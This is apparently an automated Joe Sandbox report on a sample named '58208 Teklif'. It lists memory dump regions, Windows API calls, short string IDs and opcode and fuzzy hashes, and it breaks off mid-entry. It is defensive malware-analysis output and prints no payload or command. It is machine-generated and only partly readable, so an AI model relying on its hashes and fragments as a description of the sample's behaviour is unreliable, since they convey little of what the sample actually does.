                                                      • Source File: 00000003.00000002.3790247236.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bf0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $_q$$_q
                                                      • API String ID: 0-458585787
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'_q$4'_q
                                                      • API String ID: 0-531570531
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Hcq$Hcq
                                                      • API String ID: 0-4088181183
                                                      • Opcode ID: da5318491b84dc771b40fb4c7ccdac93dd89daf3b4c680af0c229f811fcdd5ed
                                                      • Instruction ID: c6899e3639092e7142f4a3ffe8b45f9385d2c298682cd07db70a8c5e56e8fffb
                                                      • Opcode Fuzzy Hash: da5318491b84dc771b40fb4c7ccdac93dd89daf3b4c680af0c229f811fcdd5ed
                                                      • Instruction Fuzzy Hash: C991B0317442558FDB159F29C858BAF7BE6BBCA300F14886AE4468F3A9DB349C41CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ,cq$,cq
                                                      • API String ID: 0-2927840315
                                                      • Opcode ID: ab6ef39996813b0733ab50e51cf4d9fd182d8c7b3ee44664e7469ae1277b43f9
                                                      • Instruction ID: 71e0a8e9fa0630cec47c57215fb803cd529b8fa118d5202c1aefe9cac08a8c25
                                                      • Opcode Fuzzy Hash: ab6ef39996813b0733ab50e51cf4d9fd182d8c7b3ee44664e7469ae1277b43f9
                                                      • Instruction Fuzzy Hash: 78817E34A002058FDB14DF6DC888AEABBB2BFCA214B55C56AD505DF379D731E842CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (&_q$(cq
                                                      • API String ID: 0-1128674267
                                                      • Opcode ID: ba90b8536123806ed6cd3da64eb0a333183fb8f73b5058b951c1106d879aafed
                                                      • Instruction ID: 4c0db90b4bd3b02e809660d28ac890c638ae488756aaf3c6df228724e4815d7f
                                                      • Opcode Fuzzy Hash: ba90b8536123806ed6cd3da64eb0a333183fb8f73b5058b951c1106d879aafed
                                                      • Instruction Fuzzy Hash: F5716271F002199FDB55EFA9C854AAEBBB6EFC4700F148569E405AB380EF349D06C791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Xcq$Xcq
                                                      • API String ID: 0-1149048318
                                                      • Opcode ID: d86612446439250f5a4b553a6df0743bcffed83530474454a72b40953c27e3cc
                                                      • Instruction ID: a9566fb18a41633fa4870779d8a4f412675bc95a11df951dd90a618df9a1d4bb
                                                      • Opcode Fuzzy Hash: d86612446439250f5a4b553a6df0743bcffed83530474454a72b40953c27e3cc
                                                      • Instruction Fuzzy Hash: D331F635B8022587EB1A4D6E959427F66EABBC4260F04443AE906C73ACDBB4CC458695
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (o_q
                                                      • API String ID: 0-493409505
                                                      • Opcode ID: 39b73d4ae6229d5812d4e12852f3a3d5c8b0dba401afe458b6e9bd6128cf94f1
                                                      • Instruction ID: 8cb6714aa68435094d9adda46a11d4244cddaf32439d520dee78a9bb9a8c6c71
                                                      • Opcode Fuzzy Hash: 39b73d4ae6229d5812d4e12852f3a3d5c8b0dba401afe458b6e9bd6128cf94f1
                                                      • Instruction Fuzzy Hash: 4012AE30A01255DFCB15CFA8C694AAEBBF2BF89304F258956E405DB3A9C731EC81CB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06BFF862
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790247236.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bf0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: 3b39a397b9ca744cdef3182195bad4b3b1965380452802c031bd92133791f9c9
                                                      • Instruction ID: 8725788e7d2f2b8e57b448044ca1bdbb36110467a3a563907e8f867556f4ed5c
                                                      • Opcode Fuzzy Hash: 3b39a397b9ca744cdef3182195bad4b3b1965380452802c031bd92133791f9c9
                                                      • Instruction Fuzzy Hash: DD6101B1C10249AFCF11CFA9C980ADEBFB6FF49300F14819AE918AB261D7719955CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LR_q
                                                      • API String ID: 0-2241839734
                                                      • Opcode ID: f369904e6c874ea3615eeb5d4e845ed6580f09a76979d3723e38a205e0edb569
                                                      • Instruction ID: 4b6cfef0a3d8c1f1bd713c56ad5518b9a823125794c72b8b21db00b010c54361
                                                      • Opcode Fuzzy Hash: f369904e6c874ea3615eeb5d4e845ed6580f09a76979d3723e38a205e0edb569
                                                      • Instruction Fuzzy Hash: 4922ED74A4022ACFCB54EF75E995A9DBBB1FF48300F1086A9E509AB358DB306D85CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LR_q
                                                      • API String ID: 0-2241839734
                                                      • Opcode ID: 4e31f5ae7aecf2be712dc26959ea966d4acde9449b6a06103f10ebfb1bc32f26
                                                      • Instruction ID: 8b73f97c58de3cce5bb24291cf6fe5bdf8e401839d486788123447fd18795977
                                                      • Opcode Fuzzy Hash: 4e31f5ae7aecf2be712dc26959ea966d4acde9449b6a06103f10ebfb1bc32f26
                                                      • Instruction Fuzzy Hash: 2D22ED74A4022ACFCB54EF75E995A9DBBB1FF48300F1086A9E509AB358DB306D85CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LR_q
                                                      • API String ID: 0-2241839734
                                                      • Opcode ID: 14cb3156a0cfb85461c18d6bee4dd5c676f1447f234700e7f7f6929c1230ae95
                                                      • Instruction ID: b4b6f08c3050c119025e4aea4af7327a84d705ce770a25a08ebb814f02f9c6c5
                                                      • Opcode Fuzzy Hash: 14cb3156a0cfb85461c18d6bee4dd5c676f1447f234700e7f7f6929c1230ae95
                                                      • Instruction Fuzzy Hash: AE22ED74A4022ACFCB54EF75E995A9DBBB5FF48300F1086A9E509AB358DB306D85CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06BFF862
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790247236.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bf0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: c2b831f1be3608f8122ff607c746447bff6ac82fb18fb1c1f4fb14f61b24bd5c
                                                      • Instruction ID: a18d4299a2b02b727e17f56b74012de79eed16403d0c72fe9398baef82846460
                                                      • Opcode Fuzzy Hash: c2b831f1be3608f8122ff607c746447bff6ac82fb18fb1c1f4fb14f61b24bd5c
                                                      • Instruction Fuzzy Hash: 425145B1C153489FDB15CFA9C850AEDBFB5FF49300F24819AE818AB261C7749849CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06BFF862
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790247236.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bf0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: b26a8cdb7fef12191dc3791af91e4d72525b1b064738fba129fda3476245b764
                                                      • Instruction ID: 28e4f847453aee6ccdfa147a8cc0e6aa37f209ced5424119bfda16d32c378ee9
                                                      • Opcode Fuzzy Hash: b26a8cdb7fef12191dc3791af91e4d72525b1b064738fba129fda3476245b764
                                                      • Instruction Fuzzy Hash: 6851BFB1D10309DFDB54CFAAC884ADEBBB5FF48310F64816AE919AB220D7749845CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 044c59debe28adc61cd6182dfce9ec5abd14f42f621bde9e835de21e69c38d0e
                                                      • Instruction ID: 9e6460bde93210fff7ae41b6e1f2f4b633cb1de2070badcaf1e9f1f830342a35
                                                      • Opcode Fuzzy Hash: 044c59debe28adc61cd6182dfce9ec5abd14f42f621bde9e835de21e69c38d0e
                                                      • Instruction Fuzzy Hash: 86414974908128DBCF08CF99D4D4AEDBBF2BF58314F608159E419AB295CB35A986CF60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3ab34d161f5c310ef552ce5612eb430fa9138c4c2dcdab6f9e9df8093722e749
                                                      • Instruction ID: eff2889bf08866b0af7f52ff96fa19ba8c6292cc4ad14652454d9b070419b551
                                                      • Opcode Fuzzy Hash: 3ab34d161f5c310ef552ce5612eb430fa9138c4c2dcdab6f9e9df8093722e749
                                                      • Instruction Fuzzy Hash: 7C411474908129DFCB08CF99E0C4AEDBBF2BF48314F248159E415AB291CB35A986CF60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f2cd866680f8a427e680ec6ad5538ebafe200dbc064c0c3be61bebdb066a7d65
                                                      • Instruction ID: 326d1765e7b2830a26bd992282e92129c64ff211616c232b78d4dbb3d154cb31
                                                      • Opcode Fuzzy Hash: f2cd866680f8a427e680ec6ad5538ebafe200dbc064c0c3be61bebdb066a7d65
                                                      • Instruction Fuzzy Hash: 3B4159B4D042189BDF08CF9AD4C4ADDFBF6BF88314F248159E4046B295C735A986CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06BF4D76,?,?,?,?,?), ref: 06BF4E37
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790247236.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bf0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 1d8b36e2e84558fd912e5014652c62b5b26ce0ee5410767e8fb71ee85db65ded
                                                      • Instruction ID: 36189a0bbf3a7e8b9d5901d74b2de3cc4bea6a39af4cd9e64c834488e77dc207
                                                      • Opcode Fuzzy Hash: 1d8b36e2e84558fd912e5014652c62b5b26ce0ee5410767e8fb71ee85db65ded
                                                      • Instruction Fuzzy Hash: D721E5B5D102489FDB50CFAAD984ADEBBF4EB48310F14845AE914B3311D374A954CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06BF4D76,?,?,?,?,?), ref: 06BF4E37
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790247236.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bf0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: d2bcc4d96d64c87cc34040ac7f2e6b5e16f3c42a8e4ba1a6b4f1e969eff68f22
                                                      • Instruction ID: 817b4249122ea820a413ca46d0846cbc397fd65fd7b5683c9a7a2cb092738775
                                                      • Opcode Fuzzy Hash: d2bcc4d96d64c87cc34040ac7f2e6b5e16f3c42a8e4ba1a6b4f1e969eff68f22
                                                      • Instruction Fuzzy Hash: 6821E4B5D00248AFDB10CFAAD984AEEBFF5FB48310F14845AE918A7310D374A954CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LdrInitializeThunk.NTDLL(00000000), ref: 05A98ED6
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: fa0c1dce200efd3c747a567b79ade55f1fb7c72ae14407024c507454f215ab3a
                                                      • Instruction ID: e60c645f410c82b28ac7a986451de42ec0be084cfa7e0be022e45bf644a3357e
                                                      • Opcode Fuzzy Hash: fa0c1dce200efd3c747a567b79ade55f1fb7c72ae14407024c507454f215ab3a
                                                      • Instruction Fuzzy Hash: 02114274E0112A9FDF08DBA9D894EADBBF5FF89304F14C159E814A7246D738E845CB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,06BFD439,00000800,00000000,00000000), ref: 06BFD62A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790247236.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bf0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: e7dc2e98f26bbaa46938303807f614654d5e4e08704fa1f1075be21962ecd110
                                                      • Instruction ID: b0ba83bce31fe94997b22ea32941356ed19cf56dd74da73ecbe29cdf07a66c18
                                                      • Opcode Fuzzy Hash: e7dc2e98f26bbaa46938303807f614654d5e4e08704fa1f1075be21962ecd110
                                                      • Instruction Fuzzy Hash: 3E1103B6C002099FDB10DFAAD844A9EFBF4EB48310F10846AE519B7210C375A549CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,06BFD439,00000800,00000000,00000000), ref: 06BFD62A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790247236.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bf0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,06BFD184), ref: 06BFD3BE
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790247236.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bf0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,06BFD184), ref: 06BFD3BE
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790247236.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bf0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'_q
                                                      • API String ID: 0-2033115326
                                                      • Opcode ID: 11da3395d2cd7e0866b7ba88c81b07b2f65090758b3253500193096b2ec44637
                                                      • Instruction ID: 321a0c4b16dfc81bae16eabbb534730872d15e833bb28869f8a46034b2b35417
                                                      • Opcode Fuzzy Hash: 11da3395d2cd7e0866b7ba88c81b07b2f65090758b3253500193096b2ec44637
                                                      • Instruction Fuzzy Hash: 55417875A402598FCB15DF69C848BAE7BB5BB88310F20006AF906CB3B5CB71DD81CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -)1#
                                                      • API String ID: 0-1789991113
                                                      • Opcode ID: 8551da919e7261af1e7eeeb5dcf664e46ee7e558a6f0854861b734c9386b4957
                                                      • Instruction ID: 975146f284585fd2875500bbe35ce2a360c77b920f46a79bfa746f46cdd1f2dc
                                                      • Opcode Fuzzy Hash: 8551da919e7261af1e7eeeb5dcf664e46ee7e558a6f0854861b734c9386b4957
                                                      • Instruction Fuzzy Hash: B2217331E0030A8BDB14EBA9C1556AEBBB1AB49B14F20441EC511BB369CB719D4ECBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fd33d7812cf20ee579cb90a265cb782a9d0cfc416f5e3b3a61f42fae07f3269a
                                                      • Instruction ID: d88dda3c593467d68479ffefbd69b20e564e004e958b2541d5c3f89777ce2a4e
                                                      • Opcode Fuzzy Hash: fd33d7812cf20ee579cb90a265cb782a9d0cfc416f5e3b3a61f42fae07f3269a
                                                      • Instruction Fuzzy Hash: 81F14D75B012548FCB04CF6DC584AAEBBF6BF88310B2A845AE519AB375D731EC81CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 67e2ec205a1b55a68436e5e994e8de5ed753209acabceb0f62e4ec5003e66bcb
                                                      • Instruction ID: 8df12561ef40eb969c7fe8b4721535a256b5dc440de78d8297a0cc2063e84145
                                                      • Opcode Fuzzy Hash: 67e2ec205a1b55a68436e5e994e8de5ed753209acabceb0f62e4ec5003e66bcb
                                                      • Instruction Fuzzy Hash: 56D1BB75A00249CFCB15CFA9C894A9EBFF2FF88304F04856AE945AB365D330E955CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cf75f2f1b05f0c5962e5c56a33dc39caa5145c3a9602013046dbf708c01cec73
                                                      • Instruction ID: ef23b780331e1d57cc84b92124d63ef02feedb34d34df9482315dd17ed5ca5ef
                                                      • Opcode Fuzzy Hash: cf75f2f1b05f0c5962e5c56a33dc39caa5145c3a9602013046dbf708c01cec73
                                                      • Instruction Fuzzy Hash: 0D716C307402418FDB15DF2DC888A6E7BE5AF49352F1948AAE505CB3B6DB70DC41CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a295c6d3613f470cd13a8f49acfe3cf97339a6005998bd4c07c20dc3aa4a1118
                                                      • Instruction ID: c6075b3d0d47fad78f82b5a80aa735f7bcbeadebbf7ab8bf393092decd0aa178
                                                      • Opcode Fuzzy Hash: a295c6d3613f470cd13a8f49acfe3cf97339a6005998bd4c07c20dc3aa4a1118
                                                      • Instruction Fuzzy Hash: 3C51BF708E57469FD7182F26A9AD17E7BB0FB4F723B856D04F08E918188B7560A5CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 187501609e8ab4b5141aac8364d84e1159bb6791e85f65f46ee8683afee9499e
                                                      • Instruction ID: 0657cbe0541ff652288b3b4e8c4d4d73647bd8299af3b3156b43c3531ac24c35
                                                      • Opcode Fuzzy Hash: 187501609e8ab4b5141aac8364d84e1159bb6791e85f65f46ee8683afee9499e
                                                      • Instruction Fuzzy Hash: 5E81B374E412299FDB65DF29D954BEDBBB2BF89300F1081EAE809A7254DB305E85CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 104325b1d1ac1b9cdd1a7375406146c0390295585ebc34db41fcaf6b825c7e6d
                                                      • Instruction ID: aec6d84d036c55a6e435ed7f15c88c4c1291fff5cac4656dafdea53be96b0fa2
                                                      • Opcode Fuzzy Hash: 104325b1d1ac1b9cdd1a7375406146c0390295585ebc34db41fcaf6b825c7e6d
                                                      • Instruction Fuzzy Hash: 7551AD708E57468FD3183F26A9AE17E7BB4FB4F723B856C04F09E918189B7560A5CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f664b50b443a39308b3e979a83d24fe151abff1f865cdc8a2b4f4ad641a67e7c
                                                      • Instruction ID: d265b2f476b5ed7083d11ce4df1fda38e85f16cbf17c1a06eb1bc8ee5efe4f37
                                                      • Opcode Fuzzy Hash: f664b50b443a39308b3e979a83d24fe151abff1f865cdc8a2b4f4ad641a67e7c
                                                      • Instruction Fuzzy Hash: E65107B4E112188FCB04DFAAD594AEDBBF2BF89300F14952AE415BB368DB349845CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 19ba689f71bfcbc76da0df6dd20c5f43bfefe80d723f894478677d22b82455e6
                                                      • Instruction ID: 320071b17b27b08e28c882ae91314764708838f3867fb2c74bb4914b652ac7cc
